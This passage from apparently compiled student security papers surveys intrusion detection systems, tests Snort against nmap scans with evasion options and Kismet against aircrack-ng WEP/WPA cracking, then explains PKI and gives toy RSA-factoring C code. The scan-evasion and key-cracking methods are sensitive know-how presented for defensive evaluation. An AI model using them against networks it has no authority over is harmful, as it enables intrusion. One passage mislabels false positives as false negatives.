added IDPS functionalities to their products. A bundled AP may provide weaker detection capability because it has to switch back and forth between monitoring the network 270 for threats and providing network access. If only a single band or channel is required to be monitored, bundled APs would provide acceptable security and network availability. Bundled with a Switch. This solution is similar to a bundled AP. However, wireless bundled switches are usually not as good as bundled APs or dedicated sensors at detecting threats. Because of the nature of wireless technology, choosing where to put sensors for a wireless IDPS is a fundamentally different issue than choosing that for any other types of IDPS. In general, wireless sensors should be deployed such that they can cover the whole radio frequency range of the WLANs. At times, to detect rogue APs and ad-hoc WLANs, sensors are also located where there should be no wireless traffic as well as configured to monitor channels or bands that should not be used. 3.3 Security capabilities Detection capabilities. Wireless IDPS do not analyze communications at high level (e.g. IP addresses, etc.). Instead, they focus on the lower IEEE 802.11 protocol communications and are capable of detecting misconfigurations, attacks and violations of policy at WLAN protocol level. As a matter of fact, wireless IDPS can detect a wide range of malicious events. The most commonly detected types of events include the following: Unauthorized devices. Using the information gathering capabilities, most wireless IDPS are capable of detecting unauthorized WLANs, rogue APs and unauthorized stations. Poorly secured devices. Again, using the information gathering capabilities, most wireless IDPS can sort out APs and stations which are misconfigured or are using weak WLAN protocols or protocol implementations. Unusual usage patterns. Some sensors can adopt anomaly-based detection methods to sort out unusual usage patterns. Wireless network scans. At times, attackers use scanners to discover unsecured or poorly secured WLANs. Wireless sensors can effectively detect the use of such scanners in the network, provided that these scanners generate some wireless traffic during the scanning process. As a matter of fact, wireless sensors are not capable of detecting passive devices which only monitor and analyze observed traffic. Denial of service (DoS) attacks and conditions. Wireless IDPS can usually detect DoS attacks using Stateful Protocol Analysis and Anomaly-based detection methods, which can check if observed amount of traffic is consistent with the expected amount. At times, DoS attacks can be discovered by simply counting the number of events during periods of time and alerting when this number exceeds the threshold. Impersonation and man-in-the-middle attacks. Most wireless sensors can further determine the physical location of the attacker by approximately estimating the attacker’s distance from multiple sensors and then calculating the coordinates. 271 Compared to other types of IDPS, due to its limited scope (analyzing wireless protocols), wireless IDPS is, in general, more accurate. False positives are most likely produced by anomaly-based detection methods, especially if threshold values are not well configured. On the other hand, wireless IDPS do have some serious limitations such as being unable to detect certain wireless protocol threats, etc… One of the most important limitations of wireless IDPS is being vulnerable to evasion techniques and being susceptible to attacks against the IDPS themselves. The same DoS attacks (both physical and logical) which aim to disrupt WLANs can also affect the sensors. For example, an attacker can try to get close to sensors which locate at public areas (e.g. hallways, etc.) and secretly jam them. Prevention capabilities. Wireless sensors usually offer 2 types of prevention capabilities: Wireless. Some sensors are capable of sending messages through the air to the end points, telling them to terminate connections with a rogue or misconfigured station or AP. Wired. Some sensors are capable of instructing switches on the wired network to block traffic involving a specific AP or station based on the device’s switch port or MAC address. One important point to note is that while a sensor is sending signals to terminate connections, it may not be able to continue its monitoring functions until the prevention action is finished. To solve this issue, some sensors were built with 2 radios – one for monitoring and the other for enforcing prevention actions. 4 4.1 Network Behavior Analysis IDPS Introduction Network Behavior Analysis (NBA) IDPS is the type of IDPS that examines and analyzes network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware, and policy violations. 4.2 Sensors Similar to other types, NBA IDPS is often comprised of sensors, consoles and optionally management server. They are often deployed as an appliance (both software and hardware in a solution). Some NBA IDPSs monitor the network directly, just like network-based IDPS. Others do not monitor directly, but rather monitor the flow data provided by routers or networking devices (such as NetFlow flow data, provided by Cisco routers). Just like network based IDPS, NBA IDPS could be integrated into the organizations' standard networks, or they could be deployed using a separate 272 management network. Similar to network-based IDPS' sensor that could be deployed in inline or passive mode, NBA IDPS could also be deployed in these two modes. However, most NBA IDPS is often deployed in passive mode, also with the help of devices such as switch spanning port or network tap. They are often deployed at special network locations, such as border between network segments or at important network segment. The minority which is deployed in inline mode is deployed between the firewall and the Internet border router to deal with incoming attacks that could overwhelm the firewall. 4.3 Security capabilities Detection capabilities. Since NBA IDPS is used to examine network flow, the detecting mechanism of NBA IDPS is often based on anomaly-based detection, along with some stateful protocol analysis techniques, rather than using any signature-based detection capability. Anomaly-based detection means the NBA IDPS will try to generate a profile about what is considered normal behavior, and then compare the behaviors observed in the network flow with that normal profile to detect anomalous behaviors. When it's first deployed, it will undergo a training period to gather information about normal usage of user in the networks to build up its profile. After the training period, the profiles could be fixed (static ones), or adjusted constantly as the additional events are observed (dynamic ones). The static profiles have a problem that it needs to be changed periodically, because the network conditions keep changed. The dynamic profiles do not suffer this same problem, but it is susceptible to being poisoned by attacker: the attackers can perform small operations continuously until the profiles are updated and include malicious behaviors. Since NBA IDPS are based mainly on network flow data and anomaly-based detection, they are most effective and accurate when dealing with attacks that generate a large amount of network traffic: such as DoS and DDoS attack. As mentioned, they have several weaknesses when dealing with small scale attack over a long time. If there sensitivity is increased, so that they could detect smaller scale attacks, it could lead to an increase in the number of false negative, in which they mistakenly detect harmless changes to the network (such as network upgrade, a host change location, etc...) as potential threats. The detection accuracy could also vary overtime, and periodical updating on their profiles are required to maintain their detection efficiency. In additions, NBA IDPS also suffer from some other limitations. One of the most important limitations is the delay in their detection. For many IDS of this type, since they have to wait for data flowing from routers to reach them and wait until the anomaly reaches a certain level, there exists an inherent delay in their detecting capability. It could be small delay (1-2 minutes), but could also be long delay (10-15 minutes). Sometimes, it's too late to detect an attack when that attack has already been damaging the system. Some of the commercial Network Behavior Analysis Intrusion detection and prevention systems available are Cisco Guard, Cisco Traffic Anomaly Detector by Cisco Systems (http://www.cisco.com/en/US/products/hw/vpndevc/index.html), Arbor Peakflow X by Arbor Networks 273 (http://www.arbornetworks.com/products_x.php), OrcaFlow by Cetacean Networks (http://www.orcaflow.ca/features-overview.php)... 5 5.1 Host-based IDPS Introduction In the IDPS family, host-based IDPS is the eldest brother who was the first to be developed and implemented. Originally, its mission was to protect the mainframe computer where communication with the outside world was infrequent. Typically, a host-based IDPS will be directly installed on a computer system. After the IDPS was successfully deployed, it would monitor the state of the host as well as all events occurring within that host for malicious activities. Some examples of what a host-based IDPS might monitor are system logs, changes of files and directories, running processes, system and application configuration changes, wired or wireless traffic (only for that host). Since the protected system usually resides on the trusted side of the network, host-based IDPS are, in fact, close to the internal authenticated users. This advantage inevitably resulted in their highly effective capability of detecting insider threats such as disgruntled employees and corporate spies. If one of these users attempt to perform unauthorized actions, host-based IDPS will be able to detect and collect the most relevant information in the quickest possible manner. On the down side, if there are some hundreds or thousands of endpoints in a big network, collecting and aggregating separate particular machine information for each individual computer may not be very efficient and effective. Moreover, if an attacker managed to successfully turn off the data collection function on a machine, the host-based IDPS on that computer may become useless if there is no backup. In the following section, we would discuss the agent which is one of main components of host-based IDPS and then, study the security capabilities of the technology. 5.2 Agents Just like its siblings, a host-based IDPS’s main components include: consoles, management servers and database servers (optional). However, instead of using a socalled sensor, host-based IDPS have detection software called agents installed on the machines of interest (e.g. critical hosts such as publicly accessible servers and servers containing important data). Each agent will monitor activity on a single host and transmit data to a management server for analyzing. At times, agents will also perform certain prevention actions if required. As a matter of fact, instead of installing agents on individual machines, many host-based IDPS use dedicated gadget running agent software. Each gadget is configured to monitor traffic involving a specific host. Technically, this type of IDPS is more like a network-based IDPS. However, instead of monitoring the whole network, they concentrate on a particular machine. Besides, since these gadgets also 274 function in the same or similar ways as the host-based agents, IDPS products using gadget-based agents are usually considered host-based. In certain cases such as normal agents negatively affecting the performance of the monitored host, gadgetbased agents prove to be quite necessary. To provide IDPS capabilities, most agents will use shim, which is a layer of code put between existing layers of code, to capture and analyze data at a point where it would be transmitted between 2 pieces of code. On the other hand, there are also agents which do not use shim. Although these types of agents are less intrusive to the host, they tend to be less effective at detecting malicious activities and often do not have prevention capabilities. Typically, agents are designed to monitor one of the following: A server. Common applications can also be monitored together with the operating system. A client station. Agents of this type usually monitor the user’s operating system as well as common applications such as browsers or email clients. An application service. Some agents only monitor particular application service such as a Web server program. They are usually called application-based IDPS. 5.3 Security capabilities Detection capabilities. Depend on the techniques that host-based IDPS employ, the types of events detectible by them vary widely. Some commonly used techniques include the following: Code analysis. A number of techniques of this type are quite useful at detecting malware and can also prevent threats such as those that would permit unauthorized code execution or escalation of privileges. Agents may analyze attempts to execute code by using one of the following techniques: Code behavior analysis. Before a code is brought into the production system, it can first be analyzed in a sandbox environment to look for malicious behaviors by comparing to profiles or rules of known good and bad behaviors. Buffer overflow detection. Attempts to perform stack/heap overflow attacks can be discovered by searching for typical characteristics such as certain sequence of code, etc. System call monitoring. Most agents have sufficient knowledge to decide which applications or processes should call which other applications or processes or perform what actions. For example, agents can forbid certain drivers from being loaded which can prevent the threats from rootkits, etc. Application and library lists. An agent is capable of forbidding users or processes from loading certain (version of) applications and libraries. Network traffic analysis. Some host-based IDPS can analyze both wired and wireless traffic. This technique also allows them to extract files sent by applications such as email clients, etc… to look for malware. Network traffic filtering. Agents often set up a host-based firewall to sort out certain incoming/outgoing traffic for each application on the host. 275 Filesystem monitoring. One important thing to note about techniques of this kind is that some host-based IDPS base their monitoring on filenames. In other words, if an attacker changes filenames, these techniques may be useless. In general, common techniques include the following: File integrity checking. Agents usually periodically generate message digests or checksums for critical files and compare them to identify changes that have already been made by Trojan horse, etc. File attribute checking. Agents also routinely check the attributes (e.g. ownership, permissions, etc.) of important files to identify changes that have already been made. File access attempts. Any agents using filesystem shims can detect and stop all malicious attempts to access important files. Log analysis. Most agents can analyze OS and applications’ logs to look for malicious activities. Network configuration monitoring. Some agents are capable of monitoring a machine’s current network (including wired, wireless, virtual private network, etc.) configuration and discover any changes made to it. One important point to note is that because a host-based IDPS is located directly on top of a machine, it can go deeper into that particular system’s details to dig out information that its sibling IDPS may not be able to. This advantage resulted in several unique strengths of host-based IDPS: Attack verification. Since the host-based IDPS has direct access to a wide range of logs containing critical information about events that have actually occurred, it can easily check if the attack or exploit was successful or would succeed if not stopped. Based on the latter knowledge, adequate prevention actions can be selected alerts can be assigned proper priorities. Encrypted and Switched environments. In a switched network, there may be numerous segments or separate collision domains. Since Host-based IDPS’s siblings like network-based IDPS can only monitor one segment at a time, it may be difficult for them to achieve the required coverage. As for encryption, if packets are encrypted with certain types of encryption schemes, host-based IDPS’s siblings may be blind to certain threats. Host-based IDPS are, on the other hand, generally immune to these problems. To overcome switching issue, host-based IDPS can be installed on as many critical hosts as needed. Besides, since encryption has no impact on what were recorded in the logs, host-based IDPS will be able to detect threats regardless of the encryption schemes being used. No additional hardware. If gadget-based agents are not required, no additional hardware would be needed to run the host-based IDPS. This can results in great cost saving from maintenance and management. The accuracy of detection is quite challenging for host-based IDPS because a number of detection techniques employed such as log analysis is not aware of the context under which correctly detected events happened. For example, a machine may be restarted or has new application installed. These activities could be malicious in nature or they could be normal operations such as maintenance. In general, if a host- 276 based IDPS employs a bigger range of techniques, it would be able to receive more information about the occurring events. As a result, the IDPS can have a clearer picture of the situations and tends to deliver more accurate detection. Just like their siblings, host-based IDPS do have their own significant drawbacks. One of the most important issues is the delay of alerts. Even though alerts are generated as soon as malicious attempts are discovered, these attempts have usually already happened. Another limitation involves the usage of host resources (e.g. memory, processor, storage). At times, agents’ operations, especially the shims, can slow down the host’s processes. Besides, installing an agent can cause existing host security controls (e.g. firewalls, etc.) to be disabled if those controls are determined to function similarly to the agent. Prevention capabilities. In general, most of the techniques employed by hostbased IDS/IPS to detect threats can also help prevent malicious attempts from being successful. For example, a code analysis technique can prevent code (e.g. malware, etc.) from being executed. Another example is that filesystem monitoring techniques can help prevent critical files from being accessed, modified, replaced or deleted, which could effectively solve malware, Trojan horse, etc… issues. On the other hand, some of the techniques like log analysis cannot help prevent malicious activities because they can only discover harmful events after they have already happened. 6 Our experiments 6.1 SNORT (a network-based system) In the first experiment, our system under test is a Windows 7 box, running Windows 7 profession version and SNORT is the IDS that is being tested. Port scans. To perform the attack, we used the popular port scanning program: nmap (). We carried out two series of scan. Each series used three different scan methods: scan for open port (using options: -Pn), scan for OS detection (using -O), scan for services and application version detection - using options: -sV). For the first series, the scans were performed without using any detection evasion techniques. For the second series, we tried to use different avoiding techniques, including: Fragmenting the packet using-f. Setting the MTU (maximum transmission unit) using –mtu. Using random data length (--data-length). Using decoy host with –d. Reducing the sending speed (using -T). Idle scanning. 277 The result is presented in the following table: # Target for detecting 1 Open port Option Succeeded Alerted Alert type -Pn Evasion technique N/A Yes Yes OS -O N/A Yes Yes Services and apps version -sV N/A Yes Yes 2 Open port -Pn Using TCP Syn scan –sS Yes Yes Open port -Pn Using decoy – D Yes Yes Open port -Pn Yes Yes Open port -Pn Yes Yes Open port OS -Pn -O No Yes N/A Yes Services and apps version -sV Yes Yes OS and Services and apps version -O -sV Setting packet fragment and MTU: -f mtu Mixed of previous techniques Idle scan -sI Mixed of previous techniques Mixed of previous techniques Mixed of previous techniques PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] Yes Yes PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] N/A PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] Analysis. From the table, we can see that Snort can detect almost all types of common port scanning, even when the scanning is performed using evasion techniques. The source of the attack is detected in all cases. The theoretically stealthiest type of scanning (idle scanning) is quite hard to carry out, since it requires the sequence number of the idle host to be incremental, which is not very likely to happen nowadays. We tried this attack for several hours without success. 278 From this experiment, we can see that in a simple environment, for personal use, Snort can perform flawlessly against port scanning techniques. However, in real business environment, when the number of packets flowing through the network could be millions or even billions per seconds, the chance of an IDPS system like Snort missing out potential harmful packet is still possible. Therefore, scaling up the IDS system to suite the organization's need is really important to ensure security for the system. 6.2 Kismet (Wireless intrusion detection system) In our tests, we tried to carry out some attacks on some WEP and WPA keys encryption wireless network. The program used to carry out the attack is a program that is very popular in cracking wireless key: aircrack-ng (www.aircrack-ng.org/). The Wireless IDPS used here is Kismet (www.kismetwireless.net/). To perform the attack, we use a host machine to broadcast a Wireless Ad hoc networks, with some different password scheme: WEP - 5 chars key, WEP - 13 chars key, WPA - 8 chars key (common words), WPA - 8 chars key (mixed of characters). The IDS host runs Linux Ubuntu 11.10, with the Wireless interface card put in Monitor mode, and runs Kismet. The attacking machine runs Linux Ubuntu 11.10, with Aircrack-ng and Macchanger installed. For WEP cracking, we tried to perform the attack in 2 modes: passive modes (where the attacker only captures broadcasted packets from the AP, and tries to brute force the key using a statistical method), and active mode (where the attackers actively generates bogus packets to the AP, to force the AP broadcast more packets, and increase the speed of finding the key. It is known that for average, to crack 64 bit encryption WEP (length 5 keys), it requires about only 50,000-200,000 captured. For 128 bit encryption (length 13 keys), the secure level is not much better, when the attacker only need to capture about 200,000 – 700,000 encrypted data frames to crack the key. The result of the attack could be summarized as follow: For WEP key: Passive attack. The time required to crack the key is based on luck. On our first attempt, it requires only about 10 min and 5000 packets to crack a 5 char key. All the subsequent attempts on 5 char and 13 char key requires much more packets and the run time could take up hours. However, the IDS (Kismet) could not detect any problem, because no suspicious traffic is generated, and it could not raise any alert. Active attack. The time required to crack the WEP key is reduced to about 10-15 minutes on average, because a large amount of traffic could be generated. However, kismet raises several alerts, including the alerts on: increase in duplicate IVS, large amount of duplicate frames received and short de-authentication flood. 279 For WPA key: It only requires to capture a few frames during the connection establishment between the AP and the client. Therefore, only passive attack type is needed. After the frames needed are captured, a dictionary based attack is carried out. The results are actually mixed. When the keys used are common words, the attack succeeded within a few minutes. However, when the keys used are complex mixed words, the attacks failed. Besides, since there are no packet generated by the attacker, and the number of frames required to start the attack is very small (the bulk of the work is the brute force offline attack), Kismet cannot detect this threat. However, if a strong key is used, it could take a very long time for the attacker to be able to crack the key, and therefore the WPA encryption scheme is still relatively secured if handled correctly. 7 Conclusion From our survey and analysis on these types of IDPS, we can see that each type of IDPS provides different detection and prevention capabilities, they operate on different parts of an organization's network system, and they has different strengths and weaknesses on detecting different types of threat. Network-based IDPS is the type that can monitor and analyze the widest range of the network system. It can response to the most types of events, and it is often the general back bone of the system. However, for many specific types of threat, using other types of IDPS is much more effective and efficient, and sometime, inevitable: Wireless IDPS is much more suitable for securing the wireless network of the organization, Network Behavior Analysis can react better against attacks that generate an unusual amount of traffic on the network (such as under a DoS attack, where the Network-based IDPS, due to overwhelmed by number of packets to examine, could perform much worse), and Host-based IDPS is better at analyzing activity that is transferred through and end-toend communication channel (containing encrypted packet that Network-based IDPS cannot examine), and therefore Host-based IDPS will be much more suitable for protecting important hosts of the network. Therefore, in many systems, especially the big organization, in order to achieve a robust IDPS solution, it is needed to incorporate a combination, or even all of these different IDPS types. Sometimes, even different products of the same IDPS could be used, because each vendor might use different technologies in their development, which could make their product more effective against some particular types of threat in compared to others. If the organization really needs to make use of different IDPS system, they also need to consider how to integrate them in some way to achieve higher efficiency; for example: a network -based IDPS could provide data for a network-based analysis system to analyze. In addition, the organization should also include other types of technologies, besides IDPS, to achieve comprehensive security, such as firewall, routers, and even physical border or guards. On the other hand, the cost of each of these IDPS solution is quite high, especially for small to medium businesses. Therefore, implementing redundant and extra protection beyond an organization's needs could also bring many troubles. 280 There's no fast and hard rule, but each organization should carefully balance between their needs and their budget, so that they could achieve the required security level at an affordable cost. 8 Bibliography Charles P. Pfleeger, Shari Lawrence Pfleeger. Security in Computing, Fourth Edition,. Deckerd, G. (2006, November 23). Wireless Attacks from an Intrusion Detection. Hutchison, K. (2004, October 18). Wireless Intrusion Detection Systems. London. Karen Scarfone, Peter Mell. (2007, February). Guide to Intrusion Detection and Prevention Systems (IDPS). Gaithersburg, MD, United States of America: U.S. Department of Commerce. 281 282 Public Key Infrastructure: An exploration into what Public Key Infrastructure is, how it’s implemented, and how the greatest vulnerability of the Public Key Infrastructure has nothing to do with their keys. Laurence Putra Franslay National University of Singapore, School of Computing Singapore [email protected] http://www.geeksphere.net Abstract. This paper aims to introduce the reader to the concept of Public Key Infrastructure. It will explore the various types of Public Key Infrastructures currently in place, as well as how they work. The paper will then move on to specific infrastructures, and discuss the possible threats and vulnerabilities to these Infrastructures. The paper will also explore threats and vulnerabilities that have occurred in the past. 1 Introduction The concept of the Public Key Infrastructure is effectively an arrangement consisting of software, hardware, people and policies that certifies a public key to be representative of an identity, most of the time, would be either a person of a company. [1] This whole arrangement then gives an identity to the person who is issuing the public key, certifying that he is who he says he is. 2 2.1 Background Knowledge What exactly is it? This entire concept of a Public Key Infrastructure is not new. Prior to computers, we had these things called Passports, which in a sense was the public keys of those of us going abroad. Locally, we had identification cards. And these Public Keys(passports and identification cards) were issued by the embassy, or the government, which acted as what we call the Certificate Authorities these days. Hence, as we can see, the entire notion of a Public Key infrastructure is not new, and has existed within society even before computers, and that to fully understand Public Key Infrastructure, and the security behind it, we have to 283 understand the reasons why it has been around, and how it affects our lives, as well the existing vulnerabilities found in existing Public Key Infrastructures that are not related to computing. After all, these infrastructures have been around way longer than computers have been, and hence would have experienced more attempts to circumvent them. 2.2 How does the Public Key Infrastructure work? For this section onwards, most of the terms used will be describing that of within the sphere of Computer Science, while at the same time occasionally drawing on real world examples. At the center of every Public Key Infrastructure is a Certificate Authority, which will issue and verify digital certificates. How these certificates are generated is very simple and straightforward. First, the owner/server will generate his own set of public key/private key, for uses such as encrypting traffic on the Secure Sockets Layer, as well as identifying the server as the valid server.[2] After generating this public key/private key pair, the Certificate Authority will then take the public key belonging to the owner/server, and sign it. How this signing process takes place is quite straightforward as well. The Certificate Authority will take the Public Key of the owner/server, store it in a file alongside other information identifying the owner, including but not limited to the contact information, and encrypt it using their own private key. The certificate, which can then be decrypted using the Certificate Authority’s public key will show that this certificate was indeed signed by the Certificate Authority, and that the connection between the server and end user is somewhat secure. Figure 1 below is a rough representation on how the Public Key Infrastructure works. Fig. 1. The role a Certificate Authority plays in the trust chain.[3] 284 3 Research In this paper, the main research done was to measure the rate of cracking RSA keypairs, and what it means for the future of RSA encryption, especially in light of the fact that clusters can be activated at a moment’s notice, and that distributed computing is now starting to gain popularity once again. One approach I will be using on this would be to estimate how much it would take in order to fully crack a 1024 bit RSA key, both in terms of money, as well as time and compute power. In addition to that, I will also be looking at other possible attack vectors on Public Key Infrastructure, on how it’s reliability can be undermined, and how someone can successfully spoof the identity of another. 3.1 RSA and Public Key Infrastructure What is RSA? RSA stands for Rivset, Shamir, and Adleman, which in essence is an algorithm described by the 3 of them for use in Public Key Cryptography. It was the first algorithm that was suitable for both signing and encrypting of data, and was undoubtedly one of the greatest leap forward in terms of Public Key Cryptography.[4] RSA for now is believed to be secure enough, given that there is sufficiently long keys in the range of 1024bits to 2048bits, and it’s said that it is unlikely that people will be able to crack it in the near future. How RSA works? In RSA, both the public key and private key are generated from the algorithm. The Public Key is often used to encrypt the data sent over to the server, in this case, data such as the session id of the logged in user, as well as other information such as the password that the user sends over for logging in. The server will then use it’s private key to decrypt the data. The keys are generated as such. First, 2 large and distinct primes p and q are chosen at random, and are of similar bit length(i.e. same number of bits to represent both numbers). So for example, a 1024 bit modulus would require 2 512bit prime numbers. The modulus will then be represented by n, where n = pq, where p and q are the two prime numbers selected at random earlier. φ(n) will then be calculated, where φ(n) = (p − 1)(q − 1). Afterwards, a integer e will be selected, such that it fulfills both conditions 1 < e < φ(n) and gcd(e, φ(n)) = 1. e in this case will have a short bit length for more efficient encryption, but not so short such that it becomes insecure. This e will then be the public key exponent. d, the private key exponent would then be calculated such that d = e−1 modφ(n), which is most of the time calculated using the extended Euclidean algorithm. How does RSA relate to Public Key Infrastructure In most modern Public Key Infrastructures, RSA is used to generate the keys for the encryption/decryption process. For example, when one access a website through HTTPS, most of the time the response that the users return to the server are encrypted 285 using the public key. In addition, the certificate signed by the Certificate Authority on the certificates that servers use to prove their identity are more often that not signed using RSA as well. Lastly, when we SSH over to servers, their public key generated using RSA is used to identify the server, as well as encrypt the traffic between the server and the client. 3.2 Cracking RSA Methodology As described above, the RSA key pair is generated by using 2 large prime numbers, p and q, and in order to exploit it, one would have to first find these 2 numbers, p and q. The only way to find these 2 numbers would be to factorise n, and find p and q. However, due to the limitations of the C language( no 128/256/512 bit integers), and no straightforward solution to do parallel programming in python, I cracked 8bit, 16bit, 32bit, 48bit, 52bit, 56bit, 60bit and 64bit keys, took the readings, and extrapolated from there. The experiment was done on a 12- core server with 2.5 Ghz per core. Code to generate prime numbers p and q #include <stdio.h> #include <time.h> #include <math.h> unsigned long long generate(int nbits); int isPrime(unsigned long long num); unsigned long long randBits(int nbits); int main(){ /* due to lack of int128 support in c, and the inherent need for parallel computing and that python support for parallel programming is not really there, we have to resort to factorising a maximum of 64 bits. */ int nbits; unsigned long long num1, num2; printf("Please enter the number of bits for the final number: "); scanf("%d", &nbits); num1 = generate(nbits/2); num2 = generate(nbits/2); printf("Factors: %llu, %llu\n", num1, num2); printf("Value: %llu\n", num1 * num2); return 0; } unsigned long long generate(int nbits){ unsigned long long num = 4; 286 srand(time(NULL)); while(isPrime(num) == 0){ num = randBits(nbits); srand(rand()); } return num; } int isPrime(unsigned long long num){ int prime = 1; unsigned long long root = sqrt(num); long long i = 2; #pragma omp parallel shared(prime) private(i) { #pragma omp for schedule(dynamic, 1) for(i = 2; i <= root; i++){ if(num % i == 0){ prime = 0; } } } return prime; } unsigned long long randBits(int nbits){ unsigned long long min = pow(2, nbits - 1); unsigned long long max = pow(2, nbits); return rand() % (max - min) + min; } 287 Code to crack modulus n #include <stdio.h> #include <math.h> unsigned long long findFactor(unsigned long long num); int main(){ /* due to lack of int128 support in c, and the inherent need for parallel computing and that python support for parallel programming is not really there, we have to resort to factorising a maximum of 64 bits. */ unsigned long long num1, num2, value; printf("Please enter the value to crack: "); scanf("%llu", &value); num1 = findFactor(value); num2 = value/num1; printf("Factors: %llu, %llu\n", num1, num2); printf("Value: %llu\n", value); return 0; } unsigned long long findFactor(unsigned long long num){ unsigned long long root = sqrt(num), factor = 0; long long i = 2; #pragma omp parallel private(i) { #pragma omp for schedule(dynamic, 1) for(i = 2; i <= root; i++){ if(num % i == 0){ factor = i; } } } return factor; } 288 Results The figures below shows the results of the experiment. Fig. 2. Time taken to crack the various sized keys 289 Fig. 3. Average time taken to crack the various sized keys Fig. 4. Time taken to crack the various sized keys These results show a exponential growth in the time taken to crack the key as the number of bits grow larger. For example, as the number of bits increase by 4 from 52bit to 56bit, there was roughly a 4 times increment in the time taken to crack it. The pattern continued from 56bit to 60bit and 60bit to 64bit. The readings for 32 bit and below are ignored as they are largely similar, and the possible cause of that is due to the overhead required in doing multithreaded programming, and hence ignored. 290 Deductions From the experiment, we can see that there is an average growth of 4 times in the time take to crack the key every time there is an increment of the key by 4 bits. Taking the data collected, we are able to see that there is a y = 1.128 ∗ 10−6 ∗ 1.3956x relation between the number of bits and the time taken to crack it, where x is the number of bits, and y is the time required in seconds. Also, from the data obtained, the time taken for it to run sequentially is approximately 12 times of the time take to run in parallel. Hence, we can deduce that the load is roughly distributed equally between all 12 cores in the experiment. We can therefore assume that if we scale it up to more cores, the time taken to crack the key will divide equally between the cores. Conclusion for experiment Having received these results, and the deductions, we will then calculate the time required to crack a 1024bit using the elastic compute clusters offered by Amazon Web Services. For a 1024bit key, using the equation from above, it would require 1.2482 ∗ 10142 seconds for it to finish cracking a 1024bit key. This works out to 1.4447 ∗ 10137 days on a single 2.5 Ghz core. Assuming that a hacker is willing to spend approximately USD$7000 a month to hack the key, he will be able to afford 40 Extra Large High CPU Compute Instance[6]. With 8 2.5 Ghz virtual cores per compute instance, this would give the hacker 320 cores to use to crack the key. Even with this impressive infrastructure behind him, it will still take 1.2369 ∗ 10132 years to crack it. Hence, as can be seen from the above results, it is highly unlikely that the key can be cracked using brute force[5], something which has been agreed upon by Bruce Schneier, one of the legends on Computer Security. From his blog, and I quote ”We’ve never factored a 1024-bit number – at least, not outside any secret government agency – and it’s likely to require a lot more than 15 million computer years of work. The current factoring record is a 1023-bit number, but it was a special number that’s easier to factor than a product-of-two-primes number used in RSA. Breaking that Gpcode key will take a lot more mathematical prowess than you can reasonably expect to find by asking nicely on the Internet. You’ve got to understand the current best mathematical and computational optimizations of the Number Field Sieve, and cleverly distribute the parts that can be distributed. You can’t just post the products and hope for the best.”[5] 3.3 Other Attack Vectors However, despite the results above, that’s not to say that 1024bit RSA keys cannot be cracked. In March 2010, a group of researchers managed to hack 1024bit RSA encryption by meddling with the voltage passing through the CPU.[7] By exploiting a trait in the CPU, the researchers were able to slowly piece together the bits in the key to form the private key. 291 Hence, even if RSA is secure, by compromising other parts of the system, we can easily remove the security provided by RSA, and the whole Public Key Infrastructure. Another instance of such an attack that undermined the security of the Public Key Infrastructure was the recent Comodo Hack in March this year. The hacker did not attack the key. Instead, what the hacker did was to go after the equipment belonging to the Certificate Authority. By exploiting a variety of loopholes, from 0-day vulnerabilities, to penetrating vulnerabilities in firewalls, the hacker was able to gain access to the information required to spoof the Certificate Authorities. [8] From these instances, we can see that to exploit the whole Public Key Infrastructure, one does not need to try to hack the keys. One can instead go after vulnerabilities in other parts of the system, in order to gain access to the keys, and then spoof the Certificate Authorities or commit other acts. 4 Conclusion From this paper, we can hence see that the Public Key Infrastructures utilizing RSA is still very strong and the keys are not very prone to being attacked, due to the large amounts of resources required. However, at the same time, we also can see there are many parts in the mechanism behind the Public Key Infrastructure, not just the encryption/decryption keys. And in light of the fact that there are so many different parts supporting the entire Public Key Infrastructure, every aspect of this Infrastructure has to be sturdy in order for it to be fully secure. Hence, in light of recent attacks on the other parts of this infrastructure, more attention needs to be placed on these aspects as well, rather than just the Public and Private Key. 292 References 1. Jim Brayton, Andrea Finneman, Nathan Turajski, and Scott Wiltsey: SearchSecurity.com PKI(public key infrastructure) October 2006 http://searchsecurity.techtarget.com/definition/PKI 2. Song Y. Yan: Cryptanalytic attacks on RSA 3. isode.com A Short Tutorial on Distributed PKI http://www.isode.com/whitepapers/dist-pki-tutorial.html 4. Rivest, R.; A. Shamir; L. Adleman: A Method for Obtaining Digital Signatures and Public-Key Cryptosystems(1978) Communications of the ACM 21 (2) 120-126 http://theory.lcs.mit.edu/ rivest/rsapaper.pdf 5. Bruce Schneier Kaspersky Labs Trying to Crack 1024-bit RSA(June 2008) http://www.schneier.com/blog/archives/2008/06/kaspersky labs.html 6. Amazon Web Services Amazon Elastic Compute Cloud(Amazon EC2) https://aws.amazon.com/ec2/#pricing 7. Sean Hollister Engadget 1024-bit RSA encryption cracked by carefully starving CPU of electricity (March 2010) http://www.engadget.com/2010/03/09/1024-bitrsa-encryption-cracked-by-carefully-starving-cpu-of-ele/ 8. Peter Bright ars technica Comodo hacker: I hacked DigiNotar too; other CAs breached (Oct 2011) http://arstechnica.com/security/news/2011/09/comodohacker-i-hacked-diginotar-too-other-cas-breached.ars 293